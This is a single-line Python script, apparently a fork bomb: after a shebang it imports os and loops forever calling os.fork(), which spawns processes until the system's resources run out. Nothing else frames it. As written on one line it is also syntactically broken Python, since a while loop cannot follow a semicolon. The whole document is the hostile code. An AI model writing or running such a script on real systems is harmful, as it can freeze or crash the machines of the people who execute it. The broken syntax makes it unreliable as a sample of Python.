#!/usr/local/bin/python3 import os; while True: os.fork()